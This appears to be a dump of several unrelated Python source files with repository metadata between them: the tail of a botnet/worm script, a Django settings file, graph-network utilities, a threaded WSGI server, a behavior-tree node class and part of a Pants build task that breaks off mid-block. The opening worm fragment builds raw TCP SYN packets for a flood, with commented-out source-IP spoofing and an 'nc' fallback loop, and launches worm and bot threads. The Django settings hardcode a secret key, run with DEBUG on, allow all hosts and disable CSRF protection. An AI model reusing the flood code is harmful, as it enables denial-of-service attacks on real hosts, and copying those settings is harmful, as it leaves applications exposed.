def create_ip_header(src, dst):
""" Create the IP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: IPv4 header
"""
# IPv4 header fields
v_ihl = 69 # 0x45; version 4, internet header length 5
dscp_ecn = 0 # type of service
total_len = 20 + 20 # length of packet; ip header + tcp header
ident = random.randint(0, 65535) # identification
flag_frag = 0 # flag and fragment offset
ttl = 255 # time to live
protocol = socket.IPPROTO_TCP # protocol; TCP
checksum = 0 # checksum value; python fills this out??
return struct.pack('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len,
ident, flag_frag, ttl, protocol, checksum, src, dst)
def create_tcp_header(src, dst):
""" Create the TCP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: TCP header
"""
# TCP header fields
src_port = 8008 #random.randint(1024, 65535) # source port, non-privileged
dest_port = 80 # destination port; http
seq = 0 # sequence number
ack = 0 # acknowledgement number
offset_reserved = 0x50 # data offset and reserved
flags = 2 # TCP flags; SYN flag = 1
window = socket.htons(5840) # window size
checksum = 0 # checksum value
urg = 0 # urgent pointer
temp = struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
# Psuedo header fields
protocol = socket.IPPROTO_TCP # protocol; TCP
tcp_len = len(temp) # length of tcp header + payload
psh = struct.pack('!4s4sHH', src, dst, protocol, tcp_len)
checksum = calculate_tcp_checksum(psh + temp)
return struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
def create_tcp_syn_packet(target):
""" Create the TCP SYN packet
@param target: IPv4 address
@return: TCP SYN packet
"""
'''
a = random.randint(1,255)
b = random.randint(1,255)
c = random.randint(1,255)
d = random.randint(1,255)
src_ip = '{}.{}.{}.{}'.format(a, b, c, d) # spoofed ip
'''
src_ip = ID
src = socket.inet_aton(src_ip) # source IP address
dst = socket.inet_aton(target) # destination IP address
packet = create_ip_header(src, dst) + create_tcp_header(src, dst)
return packet
def tcp_syn(target):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
while state == 1:
packet = create_tcp_syn_packet(target)
for _ in xrange(100):
if state != 1:
break
sock.sendto(packet, (target , 0))
sock.close()
except: # no root privilege
while state == 1:
os.system('nc ' + target + ' 80')
##################################################################
# MAIN DRIVER
# Starts the worm driver and the bot driver
##################################################################
def main():
""" Main driver for the bot
"""
global ID
if ID.startswith('127.'): # maybe in a VM environment
try:
import netinfo
ID = netinfo.get_ip('enp0s3')
except:
pass
threading.Thread(target=bot_driver).start()
threading.Thread(target=worm_driver, args=(ID,)).start()
if __name__ == '__main__':
main()
| 30.256039
| 86
| 0.602746
|
f57b040b472b60ab908a5638c41b7493ef8f6be8
| 5,003
|
py
|
Python
|
jango/jango/settings.py
|
seemamir/django
|
e5eaf65de7e2603761624d48ab549de929d923cd
|
[
"MIT"
] | 1
|
2019-12-16T19:56:30.000Z
|
2019-12-16T19:56:30.000Z
|
jango/jango/settings.py
|
seemamir/django
|
e5eaf65de7e2603761624d48ab549de929d923cd
|
[
"MIT"
] | null | null | null |
jango/jango/settings.py
|
seemamir/django
|
e5eaf65de7e2603761624d48ab549de929d923cd
|
[
"MIT"
] | null | null | null |
"""
Django settings for jango project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SETTINGS_PATH = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'wfpqb6_tk479d@uf@#()n^%$zfr-sl&3t9eal@6kj)*qzdp0@5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
CORS_ORIGIN_ALLOW_ALL = True
CORS_ORIGIN_WHITELIST = (
'localhost:3000',
'localhost:8080',
'localhost:4000'
)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Application definition
INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.staticfiles',
'api',
'djoser',
'rest_framework.authtoken',
'rest_framework',
'django.contrib.auth',
'django.contrib.messages',
'django.contrib.sites',
'rest_framework_swagger',
'allauth',
'rest_auth',
'django_filters',
'allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.twitter',
'allauth.account',
'allauth.socialaccount',
'rest_auth.registration',
'django.contrib.admin',
'corsheaders'
]
SITE_ID = 1
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(SETTINGS_PATH, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request'
],
},
},
]
WSGI_APPLICATION = 'jango.wsgi.application'
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
# 'DEFAULT_PERMISSION_CLASSES': [
# 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
# ],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
# 'rest_framework.authentication.SessionAuthentication',
# 'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
),
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)
}
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
PASSWORD_RESET_CONFIRM_URL = "http://localhost:3000/reset-url/"
REST_SESSION_LOGIN = False
AUTHENTICATION_BACKENDS = (
# `allauth` specific authentication methods, such as login by e-mail
'allauth.account.auth_backends.AuthenticationBackend',
)
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| 27.489011
| 91
| 0.705577
|
c05ae0d418634865408acb4d9fef7ce79782af49
| 5,202
|
py
|
Python
|
resGCN/src/utils.py
|
CEfanmin/DataMiningProjects
|
b6375f542c68c0001ae2971dd7e8046a0b4afc7a
|
[
"MIT"
] | 3
|
2018-04-26T06:44:27.000Z
|
2018-09-01T13:58:21.000Z
|
resGCN/src/utils.py
|
CEfanmin/DataMiningProjects
|
b6375f542c68c0001ae2971dd7e8046a0b4afc7a
|
[
"MIT"
] | null | null | null |
resGCN/src/utils.py
|
CEfanmin/DataMiningProjects
|
b6375f542c68c0001ae2971dd7e8046a0b4afc7a
|
[
"MIT"
] | 1
|
2018-09-01T13:58:27.000Z
|
2018-09-01T13:58:27.000Z
|
import networkx as nx
import numpy as np
import sys
import pickle as pkl
import scipy.sparse as sp
def parse_index_file(filename):
index = []
for line in open(filename):
index.append(int(line.strip()))
return index
def sample_mask(idx, l):
mask = np.zeros(l)
mask[idx] = 1
return np.array(mask, dtype= np.bool)
def load_data(dataset):
"""
loads input data from data files
ind.dataset_str.x => the feature vectors of the training instances as scipy.sparse.csr.csr_matrix object;
ind.dataset_str.tx => the feature vectors of the test instances as scipy.sparse.csr.csr_matrix object;
ind.dataset_str.allx => the feature vectors of both labeled and unlabeled training instances
(a superset of ind.dataset_str.x) as scipy.sparse.csr.csr_matrix object;
ind.dataset_str.y => the one-hot labels of the labeled training instances as numpy.ndarray object;
ind.dataset_str.ty => the one-hot labels of the test instances as numpy.ndarray object;
ind.dataset_str.ally => the labels for instances in ind.dataset_str.allx as numpy.ndarray object;
ind.dataset_str.graph => a dict in the format {index: [index_of_neighbor_nodes]} as collections.defaultdict
object;
ind.dataset_str.test.index => the indices of test instances in graph, for the inductive setting as list object.
all objects above must be saved using python pickle module.
:param dataset_str: Dataset name
:return: All data input files loaded (as well the training/test data)
"""
names = ['x', 'y', 'tx', 'ty', 'allx', 'ally', 'graph']
objects = []
for i in range(len(names)):
with open("../data/ind.{}.{}".format(dataset, names[i]), 'rb') as f:
if sys.version_info > (3, 0):
objects.append(pkl.load(f, encoding = 'latin1'))
else:
objects.append(pkl.load(f))
x, y, tx, ty, allx, ally, graph = tuple(objects)
test_idx_reorder = parse_index_file("../data/ind.{}.test.index".format(dataset))
test_idx_range = np.sort(test_idx_reorder)
features = sp.vstack((allx, tx)).tolil()
features[test_idx_reorder,:] = features[test_idx_range, :]
adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))
laplacian = nx.laplacian_matrix(nx.from_dict_of_lists(graph))
labels = np.vstack((ally, ty))
labels[test_idx_reorder, :] = labels[test_idx_range, :]
idx_train = range(len(y))
idx_val = range(len(y), len(y)+500)
idx_test = test_idx_range.tolist()
train_mask = sample_mask(idx_train, labels.shape[0])
val_mask = sample_mask(idx_val, labels.shape[0])
test_mask = sample_mask(idx_test, labels.shape[0])
y_train = np.zeros(labels.shape)
y_val = np.zeros(labels.shape)
y_test = np.zeros(labels.shape)
y_train[train_mask, :] = labels[train_mask, :]
y_val[val_mask, :] = labels[val_mask, :]
y_test[test_mask, :] = labels[test_mask, :]
return adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, laplacian
def sparse_to_tuple(sparse_mx):
"""
Convert sparse matrix to tuple representation
"""
def to_tuple(mx):
if not sp.isspmatrix_coo(mx):
mx = mx.tocoo()
coords = np.vstack((mx.row, mx.col)).transpose()
values = mx.data
shape = mx.shape
return coords, values, shape
if isinstance(sparse_mx, list):
for i in range(len(sparse_mx)):
sparse_mx[i] = to_tuple(sparse_mx[i])
else:
sparse_mx = to_tuple(sparse_mx)
return sparse_mx
def preprocess_features(features):
"""
Row-normalize feature matrix and convert to tuple representation
"""
rowsum = np.array(features.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
features = r_mat_inv.dot(features)
return sparse_to_tuple(features)
def normalize_adj(adj):
"""Symmetrically normalize adjacency matrix."""
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1))
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()
def preprocess_adj(adj):
"""
Preprocessing of adjacency matrix for simple GCN model
and conversion to tuple representation
"""
adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))
return sparse_to_tuple(adj_normalized)
def preprocess_lap(lap):
"""
Preprocessing of laplacian matrix for simple resGCN model
and conversion to tuple representation
"""
return sparse_to_tuple(lap)
def construct_feed_dict(features, support, labels, labels_mask, placeholders):
"""Construct feed dictionary."""
feed_dict = dict()
feed_dict.update({placeholders['labels']: labels})
feed_dict.update({placeholders['labels_mask']: labels_mask})
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['support'][i]: support[i] for i in range(len(support))})
feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})
return feed_dict
| 36.893617
| 115
| 0.680892
|
6f0db0e712efe580d05f6b9459eaccf9e965c7b8
| 1,739
|
py
|
Python
|
Servers/simple_multithreaded_wsgi.py
|
kevinlee05/python-snippets
|
359b127f2e55113a628503d1ff69ba1cfac1f77d
|
[
"MIT"
] | null | null | null |
Servers/simple_multithreaded_wsgi.py
|
kevinlee05/python-snippets
|
359b127f2e55113a628503d1ff69ba1cfac1f77d
|
[
"MIT"
] | null | null | null |
Servers/simple_multithreaded_wsgi.py
|
kevinlee05/python-snippets
|
359b127f2e55113a628503d1ff69ba1cfac1f77d
|
[
"MIT"
] | null | null | null |
'''WSGI-compliant HTTP server. Dispatches requests to a pool of threads.'''
from wsgiref.simple_server import WSGIServer, WSGIRequestHandler
import multiprocessing.pool
__all__ = ['ThreadPoolWSGIServer', 'make_server']
class ThreadPoolWSGIServer(WSGIServer):
'''WSGI-compliant HTTP server. Dispatches requests to a pool of threads.'''
def __init__(self, thread_count=None, *args, **kwargs):
'''If 'thread_count' == None, we'll use multiprocessing.cpu_count() threads.'''
WSGIServer.__init__(self, *args, **kwargs)
self.thread_count = thread_count
self.pool = multiprocessing.pool.ThreadPool(self.thread_count)
# Inspired by SocketServer.ThreadingMixIn.
def process_request_thread(self, request, client_address):
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
self.pool.apply_async(self.process_request_thread, args=(request, client_address))
def make_server(host, port, app, thread_count=None, handler_class=WSGIRequestHandler):
'''Create a new WSGI server listening on `host` and `port` for `app`'''
httpd = ThreadPoolWSGIServer(thread_count, (host, port), handler_class)
httpd.set_app(app)
return httpd
if __name__ == '__main__':
from wsgiref.simple_server import demo_app
httpd = make_server('', 8000, demo_app)
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
import webbrowser
webbrowser.open('http://localhost:8000/xyz?abc')
httpd.serve_forever()
| 37
| 90
| 0.706728
|
288b35934cb015d6d863330dc5aba6502d49fd2b
| 6,178
|
py
|
Python
|
b3/core/basenode.py
|
collaborative-robotics/behavior3py
|
d65ec781a1fefde7ad8f6c4369833054da312a7e
|
[
"MIT"
] | 2
|
2020-12-02T22:56:45.000Z
|
2021-01-14T21:22:55.000Z
|
b3/core/basenode.py
|
collaborative-robotics/behavior3py
|
d65ec781a1fefde7ad8f6c4369833054da312a7e
|
[
"MIT"
] | null | null | null |
b3/core/basenode.py
|
collaborative-robotics/behavior3py
|
d65ec781a1fefde7ad8f6c4369833054da312a7e
|
[
"MIT"
] | 1
|
2020-12-02T22:56:49.000Z
|
2020-12-02T22:56:49.000Z
|
import b3
import uuid
__all__ = ['BaseNode']
class BaseNode(object):
category = None
title = None
description = None
def __init__(self):
self.id = str(uuid.uuid1())
self.title = self.title or self.__class__.__name__
self.description = self.description or ''
self.parameters = {}
self.properties = {}
# data for learning/adaptation of BTs
self.Name = "--unnamed--"
self.BHdebug = 0
self.N_ticks = 0 # number of ticks of this node
self.N_success = 0 # number of success returns
self.state = 0 # a variable on which to condition success probs.
self.N_tik2 = [0, 0, 0, 0] # number of ticks on each state
self.N_suc2 = [0, 0, 0, 0] # prob success conditioned on state
self.Ps = 0.0 # P(success) (fixed param used with stochastic success simulations)
self.P_selector = 0.0 # probability selected by selector S02
self.Cost = 0 # Cost of ticking this leaf (INT!)
self.Utility = 0.0 # U = P/C
self.Utility_Mode = "RATIO"
self.suc = 0
self.fail = 0
# BH estimate local success probability
def prob(self):
if self.N_ticks > 0:
# empirical success prob.
empPs = float(self.N_success) / float(self.N_ticks)
#print "P(s) = ", empPs
return empPs
else:
return 0.1
# BH get Utility for this node
def get_Utility(self):
if(self.Utility_Mode == "RATIO"):
if(self.Cost > 0):
self.Utility = self.prob() / self.Cost
else:
self.Utility = self.prob()
#if(self.BHdebug == 1):
#print self.Name + '.get_Utility(): Cost: ' + str(self.Cost) +' P(S): ' + str(self.Ps) + ' Utility: ' + str(self.Utility)
if(self.Utility_Mode == "NEG_COST"):
self.Utility = self.prob() * (-1) * self.Cost
return self.Utility
# BH get Utility for this node CONDITIONED on STATE
def get_Utility2(self): # for now use on Leafs only
if(self.Utility_Mode == "RATIO"):
if(self.Cost > 0):
self.Utility = self.prob_state()[self.state] / self.Cost
else:
self.Utility = self.prob_state()[self.state]
#if(self.BHdebug == 1):
#print self.Name + '.get_Utility(): Cost: ' + str(self.Cost) +' P(S): ' + str(self.Ps) + ' Utility: ' + str(self.Utility)
if(self.Utility_Mode == "NEG_COST"):
self.Utility = self.prob_state()[self.state] * (-1) * self.Cost
return self.Utility
# BH
def get_state(self, bb): # update your own state -- need to overlay this
print self.Name , ": trying to update external sensing state -- not yet defined"
quit()
# BH estimate local success probability
def prob_state(self):
p = [0.0,0.0,0.0,0.0]
for i in range(0,len(p)):
if self.N_tik2[i] > 0:
p[i] = float(self.N_suc2[i]) / float(self.N_tik2[i])
else:
p[i] = 0.5
if(0):
s = "{:4.2} {:4.2} {:4.2} {:4.2} ".format(p[0],p[1],p[2],p[3])
print self.Name,"prob_state(): ",s
s = "{:4} {:4} {:4} {:4} ".format(self.N_suc2[0],self.N_suc2[1],self.N_suc2[2],self.N_suc2[3])
print self.Name,"N Success: ",s
s = "{:4} {:4} {:4} {:4} ".format(self.N_tik2[0],self.N_tik2[1],self.N_tik2[2],self.N_tik2[3])
print self.Name,"N tik2: ",s
#print self.Name, p
return p
# BH reset the probability counters
def p_reset(self):
self.N_ticks = 0
self.N_success = 0
self.N_tik2 = [0.0,0.0,0.0,0.0]
self.N_suc2 = [0.0,0.0,0.0,0.0]
# report your stats
def report_stats(self):
print '\n\n',self.Name,' Statistics'
print 'N_ticks: ',self.N_ticks
print 'N_success: ',self.N_success
print 'prob ',self.prob()
print 'Cost: ',self.Cost
print 'Utility: ',self.get_Utility()
print 'Utilty mode: ',self.Utility_Mode
@property
def name(self):
return self.__class__.__name__
def _execute(self, tick):
self._enter(tick)
if (not tick.blackboard.get('is_open', tick.tree.id, self.id)):
self._open(tick)
#print(self.name, ' _execute()')
status = self._tick(tick)
if (status != b3.RUNNING):
self._close(tick)
self._exit(tick)
return status
def _enter(self, tick):
tick._enter_node(self)
self.enter(tick)
def _open(self, tick):
tick._open_node(self)
tick.blackboard.set('is_open', True, tick.tree.id, self.id)
self.open(tick)
def _tick(self, tick):
tick._tick_node(self)
#BH count the ticks
self.N_ticks += 1
if(self.BHdebug == 1):
print 'basenode: ', self.Name, " ticked "
status = self.tick(tick)
#BH count the total cost
tick.blackboard.inc('TotalCost',self.Cost)
if(self.BHdebug == 1):
if(status == b3.SUCCESS):
print "basenode: ", self.Name, " SUCCESS "
elif(status == b3.FAILURE):
print "basenode: ", self.Name, " FAIL"
# BH keep track of successful ticks
if(status == b3.SUCCESS):
self.N_success += 1
self.N_suc2[self.state] += 1
if(tick.tree.log_flag > 0):
tick.tree.log_file.write('S '+self.Name+'\n')
if(status == b3.FAILURE and tick.tree.log_flag > 1):
tick.tree.log_file.write('F '+self.Name+'\n')
return status
def _close(self, tick):
tick._close_node(self)
tick.blackboard.set('is_open', False, tick.tree.id, self.id)
self.close(tick)
def _exit(self, tick):
tick._exit_node(self)
self.exit(tick)
def enter(self, tick): pass
def open(self, tick): pass
def tick(self, tick): pass
def close(self, tick): pass
def exit(self, tick): pass
| 33.759563
| 143
| 0.541761
|
81deb293078bb71db98183e8abfa53b33dcee6b2
| 130
|
py
|
Python
|
vDjango/sobre/views.py
|
VinicBueno/Django
|
e06f8e79ec95ac7519cf8ffcf8c0e2062f03cad4
|
[
"MIT"
] | null | null | null |
vDjango/sobre/views.py
|
VinicBueno/Django
|
e06f8e79ec95ac7519cf8ffcf8c0e2062f03cad4
|
[
"MIT"
] | null | null | null |
vDjango/sobre/views.py
|
VinicBueno/Django
|
e06f8e79ec95ac7519cf8ffcf8c0e2062f03cad4
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def index (request):
return render(request, 'sobre/index.html')
| 26
| 46
| 0.753846
|
9e792eb43b11b95b3535b9c76a6076dfe3e459ba
| 3,888
|
py
|
Python
|
models.py
|
ashutoshbsathe/adversarial_reprogramming
|
83c59c8bd2432f307876f9a7d02031b1eceb97e5
|
[
"MIT"
] | null | null | null |
models.py
|
ashutoshbsathe/adversarial_reprogramming
|
83c59c8bd2432f307876f9a7d02031b1eceb97e5
|
[
"MIT"
] | null | null | null |
models.py
|
ashutoshbsathe/adversarial_reprogramming
|
83c59c8bd2432f307876f9a7d02031b1eceb97e5
|
[
"MIT"
] | 2
|
2019-08-17T05:43:56.000Z
|
2020-05-19T07:42:38.000Z
|
"""
ResNet in PyTorch
Reference :
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=10):
super(ResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ResNet18():
return ResNet(BasicBlock, [2,2,2,2])
def ResNet34():
return ResNet(BasicBlock, [3,4,6,3])
def ResNet50():
return ResNet(Bottleneck, [3,4,6,3])
def ResNet101():
return ResNet(Bottleneck, [3,4,23,3])
def ResNet152():
return ResNet(Bottleneck, [3,8,36,3])
| 34.714286
| 102
| 0.6268
|
ee1a6f7d31dddf0f1108ba777d1097927e1eb7c7
| 235
|
py
|
Python
|
src/tradingkit/strategy/none_strategy.py
|
logictraders/tradingk
|
b00a3eb82d5f1276581dd44dab1153772956ad74
|
[
"MIT"
] | 3
|
2021-03-07T01:17:25.000Z
|
2021-10-13T10:53:11.000Z
|
src/tradingkit/strategy/none_strategy.py
|
logictraders/tradingk
|
b00a3eb82d5f1276581dd44dab1153772956ad74
|
[
"MIT"
] | 14
|
2021-01-03T18:54:09.000Z
|
2022-03-16T15:42:45.000Z
|
src/tradingkit/strategy/none_strategy.py
|
logictraders/tradingk
|
b00a3eb82d5f1276581dd44dab1153772956ad74
|
[
"MIT"
] | 2
|
2021-03-07T01:19:25.000Z
|
2021-07-19T21:13:33.000Z
|
from tradingkit.strategy.strategy import Strategy
class NoneStrategy(Strategy):
def get_symbol(self):
return 'BTC/USD'
def subscribed_events(self) -> list:
return []
def finish(self):
return {}
| 16.785714
| 49
| 0.642553
|
4ac6304c16507c61313443cb156aca3b298961c1
| 1,579
|
py
|
Python
|
tests/pnr/test_render_placements.py
|
pretl/ALIGN-public
|
4b03042d9e96fa669740427842b0bf268b0c9a86
|
[
"BSD-3-Clause"
] | 119
|
2019-05-14T18:44:34.000Z
|
2022-03-17T01:01:02.000Z
|
tests/pnr/test_render_placements.py
|
pretl/ALIGN-public
|
4b03042d9e96fa669740427842b0bf268b0c9a86
|
[
"BSD-3-Clause"
] | 717
|
2019-04-03T15:36:35.000Z
|
2022-03-31T21:56:47.000Z
|
tests/pnr/test_render_placements.py
|
pretl/ALIGN-public
|
4b03042d9e96fa669740427842b0bf268b0c9a86
|
[
"BSD-3-Clause"
] | 34
|
2019-04-01T21:21:27.000Z
|
2022-03-21T09:46:57.000Z
|
from align.pnr.render_placement import gen_boxes_and_hovertext
def test_gen_boxes_and_hovertext():
placement_verilog_d = {
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1}
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 0, "oY": 20, "sX": 1, "sY": 1}
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [4,4,6,6]
}
]
}
]
}
lst = list(gen_boxes_and_hovertext( placement_verilog_d, 'top'))
bbox_rects = [ tup[0] for tup in lst if tup[2] and not tup[4]]
term_rects = [ tup[0] for tup in lst if tup[2] and tup[4]]
assert bbox_rects[0] == [0,0,10,10]
assert bbox_rects[1] == [0,20,10,30]
assert term_rects[0] == [4,4,6,6]
assert term_rects[1] == [4,24,6,26]
| 30.960784
| 78
| 0.40532
|
9ae75bc827312f5bd5be7b0e2444b851b891ab70
| 2,029
|
py
|
Python
|
src/python/pants/backend/python/tasks/python_run.py
|
anthonyjpratti/pants
|
d98e53af6ddd877861231bce8343f8204da0a9d1
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/backend/python/tasks/python_run.py
|
anthonyjpratti/pants
|
d98e53af6ddd877861231bce8343f8204da0a9d1
|
[
"Apache-2.0"
] | 1
|
2019-07-29T16:58:21.000Z
|
2019-07-29T16:58:21.000Z
|
src/python/pants/backend/python/tasks/python_run.py
|
anthonyjpratti/pants
|
d98e53af6ddd877861231bce8343f8204da0a9d1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import signal
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.tasks.python_execution_task_base import PythonExecutionTaskBase
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnitLabel
from pants.util.osutil import safe_kill
from pants.util.strutil import safe_shlex_split
class PythonRun(PythonExecutionTaskBase):
"""Run a Python executable."""
@classmethod
def register_options(cls, register):
super().register_options(register)
register('--args', type=list, help='Run with these extra args to main().')
@classmethod
def supports_passthru_args(cls):
return True
def execute(self):
binary = self.require_single_root_target()
if isinstance(binary, PythonBinary):
# We can't throw if binary isn't a PythonBinary, because perhaps we were called on a
# jvm_binary, in which case we have to no-op and let jvm_run do its thing.
# TODO(benjy): Use MutexTask to coordinate this.
pex = self.create_pex(binary.pexinfo)
args = []
for arg in self.get_options().args:
args.extend(safe_shlex_split(arg))
args += self.get_passthru_args()
env = self.prepare_pex_env()
self.context.release_lock()
cmdline = ' '.join(pex.cmdline(args))
with self.context.new_workunit(name='run',
cmd=cmdline,
labels=[WorkUnitLabel.TOOL, WorkUnitLabel.RUN]):
po = pex.run(blocking=False, args=args, env=env)
try:
result = po.wait()
if result != 0:
msg = f'{cmdline} ... exited non-zero ({result})'
raise TaskError(msg, exit_code=result)
except KeyboardInterrupt:
# The process may still have exited, even if we were interrupted.
